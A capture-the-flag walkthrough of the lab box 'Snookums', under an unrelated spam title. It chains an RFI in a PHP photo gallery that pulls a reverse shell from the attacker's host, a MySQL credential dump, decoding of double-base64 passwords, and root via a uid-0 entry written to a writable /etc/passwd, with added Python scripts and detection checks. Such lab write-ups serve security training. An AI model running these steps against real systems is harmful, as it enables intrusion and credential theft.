
Beijing website system development_which inventory management software is best_tips for promoting on a platform_Baidu download and install official download

Time: 2025/7/28 16:45:34  Source: https://blog.csdn.net/N61320/article/details/142927416  Views: 0

Key points

  • Check file permissions; escalate to root by writing a uid-0 entry into /etc/passwd

Steps

Running nmap does not turn up much that is useful; in practice only port 80 is worth a closer look.

Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-10-14 05:01 UTC
Nmap scan report for 192.168.53.58
Host is up (0.0010s latency).
Not shown: 65527 filtered tcp ports (no-response)
PORT      STATE SERVICE     VERSION
21/tcp    open  ftp         vsftpd 3.0.2
| ftp-syst: 
|   STAT: 
| FTP server status:
|      Connected to ::ffff:192.168.49.53
|      Logged in as ftp
|      TYPE: ASCII
|      No session bandwidth limit
|      Session timeout in seconds is 300
|      Control connection is plain text
|      Data connections will be plain text
|      At session startup, client count was 2
|      vsFTPd 3.0.2 - secure, fast, stable
|_End of status
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_Can't get directory listing: TIMEOUT
22/tcp    open  ssh         OpenSSH 7.4 (protocol 2.0)
| ssh-hostkey: 
|   2048 4a:79:67:12:c7:ec:13:3a:96:bd:d3:b4:7c:f3:95:15 (RSA)
|   256 a8:a3:a7:88:cf:37:27:b5:4d:45:13:79:db:d2:ba:cb (ECDSA)
|_  256 f2:07:13:19:1f:29:de:19:48:7c:db:45:99:f9:cd:3e (ED25519)
80/tcp    open  http        Apache httpd 2.4.6 ((CentOS) PHP/5.4.16)
|_http-title: Simple PHP Photo Gallery
|_http-server-header: Apache/2.4.6 (CentOS) PHP/5.4.16
111/tcp   open  rpcbind     2-4 (RPC #100000)
| rpcinfo: 
|   program version    port/proto  service
|   100000  2,3,4        111/tcp   rpcbind
|   100000  2,3,4        111/udp   rpcbind
|   100000  3,4          111/tcp6  rpcbind
|_  100000  3,4          111/udp6  rpcbind
139/tcp   open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: SAMBA)
445/tcp   open  netbios-ssn Samba smbd 4.10.4 (workgroup: SAMBA)
3306/tcp  open  mysql       MySQL (unauthorized)
33060/tcp open  mysqlx?
| fingerprint-strings: 
|   DNSStatusRequestTCP, LDAPSearchReq, NotesRPC, SSLSessionReq, TLSSessionReq, X11Probe, afp: 
|     Invalid message"
|_    HY000

Port 80 runs Simple PHP Photo Gallery v0.8.

Searching around shows that version 0.7 of this gallery has a known remote file inclusion (RFI) bug in the img parameter of image.php, and it works against this install as well. Following the exploit: create a PHP reverse shell locally, set the attacker IP/port inside it, start a listener with nc -nlvp 80, and then request the link below. Two things the link implies: the shell is fetched from port 3306 on the attacker machine, so something must serve the file there as plain text (for example python3 -m http.server 3306; if the file were served through a PHP interpreter the target would receive the shell's output rather than its source), and remote inclusion only succeeds when the target's PHP has allow_url_include enabled, which is evidently the case here.

http://192.168.215.58/image.php?img=http://192.168.45.239:3306/new_php_shell.php

The reverse shell comes back as the apache user:

C:\home\kali\Documents\OFFSEC\GoToWork\Snookums> nc -nlvp 80
listening on [any] 80 ...
connect to [192.168.45.239] from (UNKNOWN) [192.168.215.58] 47170
SOCKET: Shell has connected! PID: 22992
id
uid=48(apache) gid=48(apache) groups=48(apache) context=system_u:system_r:httpd_t:s0

An ls -l in the shell's working directory shows db.php, which holds the MySQL credentials:

<?php
define('DBHOST', '127.0.0.1');
define('DBUSER', 'root');
define('DBPASS', 'MalapropDoffUtilize1337');
define('DBNAME', 'SimplePHPGal');
?>

Connecting to MySQL with those credentials reveals a users table with three usernames and (encoded) passwords:

mysql> use SimplePHPGal;
use SimplePHPGal;
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A

Database changed
mysql> show tables;
show tables;
+------------------------+
| Tables_in_SimplePHPGal |
+------------------------+
| users                  |
+------------------------+
1 row in set (0.01 sec)

mysql> select * from users;
select * from users;
+----------+----------------------------------------------+
| username | password                                     |
+----------+----------------------------------------------+
| josh     | VFc5aWFXeHBlbVZJYVhOelUyVmxaSFJwYldVM05EYz0= |
| michael  | U0c5amExTjVaRzVsZVVObGNuUnBabmt4TWpNPQ==     |
| serena   | VDNabGNtRnNiRU55WlhOMFRHVmhiakF3TUE9PQ==     |
+----------+----------------------------------------------+
3 rows in set (0.00 sec)

cat /etc/passwd shows that michael is a local user with a login shell:

......
......
michael:x:1000:1000:Michael:/home/michael:/bin/bash
......
......

The stored values look like base64 applied twice. Decoding U0c5amExTjVaRzVsZVVObGNuUnBabmt4TWpNPQ== twice with base64 -d gives michael's password:

C:\home\kali\Documents\OFFSEC\GoToWork\Snookums> echo "U0c5amExTjVaRzVsZVVObGNuUnBabmt4TWpNPQ==" | base64 -d
SG9ja1N5ZG5leUNlcnRpZnkxMjM=
C:\home\kali\Documents\OFFSEC\GoToWork\Snookums> echo "SG9ja1N5ZG5leUNlcnRpZnkxMjM=" | base64 -d
HockSydneyCertify123
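The two-step decode above generalises to the whole table: the script below peels base64 layers until the result is no longer well-formed base64 or no longer printable text, and runs that over all three rows. This is an added example, not code from the original post; the three rows are copied from the users table as printed above, and the stop rule (strict base64 plus a printable-ASCII check) is an assumption about what a finished password looks like rather than anything the gallery enforces.

```python
import base64
import binascii
import string

# The three rows of SimplePHPGal.users exactly as printed in the writeup.
USERS = {
    "josh": "VFc5aWFXeHBlbVZJYVhOelUyVmxaSFJwYldVM05EYz0=",
    "michael": "U0c5amExTjVaRzVsZVVObGNuUnBabmt4TWpNPQ==",
    "serena": "VDNabGNtRnNiRU55WlhOMFRHVmhiakF3TUE9PQ==",
}

# Bytes we still accept as "text": printable ASCII plus space/tab/newline.
TEXT_BYTES = frozenset(string.printable.encode()) - frozenset(b"\x0b\x0c")


def _b64_layer(data):
    """One strict base64 decode; None if data is not well-formed base64."""
    try:
        return base64.b64decode(data, validate=True)
    except (binascii.Error, ValueError):
        return None


def peel_base64(value, max_layers=8):
    """Decode repeatedly until the output stops being valid base64 or stops
    being printable text. Returns (plaintext, layers_removed); a value that
    is not base64 at all comes back unchanged with 0 layers."""
    current = value.strip().encode("ascii")
    layers = 0
    while layers < max_layers:
        decoded = _b64_layer(current)
        # The printable check matters: "HockSydneyCertify123" is 20 chars,
        # a multiple of 4, so it "decodes" to binary junk rather than failing.
        if not decoded or any(b not in TEXT_BYTES for b in decoded):
            break
        current = decoded
        layers += 1
    return current.decode("ascii"), layers


def decode_users(rows=USERS):
    """Map each username to (password, layers) for the whole table."""
    return {user: peel_base64(enc) for user, enc in rows.items()}


if __name__ == "__main__":
    for user, (password, layers) in decode_users().items():
        print(f"{user:8} {password}  (base64 x{layers})")
```

All three rows turn out to be exactly two layers deep, so once michael's password is recovered the same loop hands over josh's and serena's as well, which is worth knowing before choosing which account to try over SSH.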

SSH as michael with that password works, and the first flag is in local.txt:

C:\home\kali\Documents\OFFSEC\GoToWork\Snookums> ssh michael@192.168.215.58     
The authenticity of host '192.168.215.58 (192.168.215.58)' can't be established.
ED25519 key fingerprint is SHA256:rouy0/8CKEfhPY0eheyBSXy00UrbHzUFfNIMlNdCNfI.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.215.58' (ED25519) to the list of known hosts.
michael@192.168.215.58's password: 
Last login: Mon Oct 14 07:35:25 2024
[michael@snookums ~]$ clear
[michael@snookums ~]$ ls -lrt
total 4
-rw-r--r--. 1 michael michael 33 Oct 14 02:03 local.txt

Upload and run linpeas.sh; surprisingly, /etc/passwd turns out to be writable:

╔══════════╣ Permissions in init, init.d, systemd, and rc.d
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#init-init-d-systemd-and-rc-d
═╣ Hashes inside passwd file? ........... No
═╣ Writable passwd file? ................ /etc/passwd is writable
═╣ Credentials in fstab/mtab? ........... No
═╣ Can I read shadow files? ............. No
═╣ Can I read shadow plists? ............ No
═╣ Can I write shadow plists? ........... No
═╣ Can I read opasswd file? ............. No
═╣ Can I write in network-scripts? ...... No
═╣ Can I read root folder? .............. No

Generate a password hash with openssl and build a new /etc/passwd entry for an account with uid 0 and gid 0. This works because a hash placed in the second field of /etc/passwd is used directly; /etc/shadow is only consulted when that field is x, so the new account logs in with the chosen password without touching the shadow file. Copy the hash exactly as openssl prints it: with -1 it is MD5-crypt and begins with $1$tim$, and the second field of the entry as reproduced below does not carry that prefix, so take the hash from your own openssl output rather than from this line.

openssl passwd -1 -salt 'tim' '1234'
tim:.XIfIc3zTStgJZBye1:0:0:root:/root:/bin/bash

Append the line to /etc/passwd, then su tim with the password 1234 to get root:

[michael@snookums tmp]$ su tim
Password: 
[tim@snookums tmp]$ cat /root/proof.txt
4dd16e15c91eb4afe33e4225caffa992
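The whole chain above (confirm /etc/passwd is writable, mint an MD5-crypt hash with openssl, append a uid-0 entry, then log in as it) as an added Python example, not code from the original post. It runs against a scratch copy of a constructed passwd excerpt, never the real file; openssl is invoked with the same arguments as in the writeup, and the two helpers uid0_accounts and hashes_in_passwd are the defender's side of the same checks linpeas printed above, written out so they can be run over any passwd file.

```python
import os
import shutil
import subprocess
import tempfile

# Constructed excerpt of the target's /etc/passwd: a normal root entry plus
# the michael line the writeup shows. Sample data, not the full file.
SAMPLE_PASSWD = (
    "root:x:0:0:root:/root:/bin/bash\n"
    "michael:x:1000:1000:Michael:/home/michael:/bin/bash\n"
)


def md5crypt_hash(password, salt):
    """The same hash the writeup makes with `openssl passwd -1 -salt tim 1234`.
    Returns '$1$<salt>$<22 chars>', or None when openssl is not installed."""
    if shutil.which("openssl") is None:
        return None
    proc = subprocess.run(
        ["openssl", "passwd", "-1", "-salt", salt, password],
        capture_output=True, text=True, check=True,
    )
    return proc.stdout.strip()


def root_entry(user, pw_hash, shell="/bin/bash"):
    """Seven-field passwd line. uid 0 / gid 0 make the account root, and a
    hash in the second field is used directly (shadow is only consulted
    when that field is 'x')."""
    return f"{user}:{pw_hash}:0:0:root:/root:{shell}"


def passwd_is_writable(path="/etc/passwd"):
    """The precondition linpeas flagged: can this user write the file?"""
    return os.access(path, os.W_OK)


def append_entry(path, entry):
    """Append one entry, making sure it starts on its own line."""
    with open(path, "r+", encoding="utf-8") as fh:
        existing = fh.read()
        if existing and not existing.endswith("\n"):
            fh.write("\n")
        fh.write(entry + "\n")


def uid0_accounts(passwd_text):
    """Defender's check: every well-formed entry with uid 0. Anything here
    besides root is a backdoor of exactly this kind."""
    found = []
    for line in passwd_text.splitlines():
        fields = line.split(":")
        if len(fields) == 7 and fields[2] == "0":
            found.append(fields[0])
    return found


def hashes_in_passwd(passwd_text):
    """Defender's check: entries whose password field holds a hash instead
    of the usual placeholder (linpeas' 'Hashes inside passwd file?')."""
    found = []
    for line in passwd_text.splitlines():
        fields = line.split(":")
        if len(fields) == 7 and fields[1] not in ("x", "*", "!", "!!", ""):
            found.append(fields[0])
    return found


def demo(work_dir=None):
    """Run the whole chain against a scratch copy, never the real file.
    Returns (file contents, uid-0 accounts, accounts with an inline hash)."""
    work_dir = work_dir or tempfile.mkdtemp()
    path = os.path.join(work_dir, "passwd")
    with open(path, "w", encoding="utf-8") as fh:
        fh.write(SAMPLE_PASSWD)
    # Placeholder only when openssl is missing; a real run pastes openssl's output.
    pw_hash = md5crypt_hash("1234", "tim") or "$1$tim$PLACEHOLDER.FROM.OPENSSL"
    if passwd_is_writable(path):
        append_entry(path, root_entry("tim", pw_hash))
    with open(path, encoding="utf-8") as fh:
        text = fh.read()
    return text, uid0_accounts(text), hashes_in_passwd(text)


if __name__ == "__main__":
    contents, uid0, hashed = demo()
    print(contents)
    print("uid 0 accounts:", uid0)   # root plus the added tim entry
    print("inline hashes:", hashed)  # only tim
```

On the attacking side the interesting return value is the entry itself; on the defending side, a non-empty result from hashes_in_passwd or a second name from uid0_accounts is the signal that someone has done this, and both are cheap enough to run from a cron job or a file-integrity check.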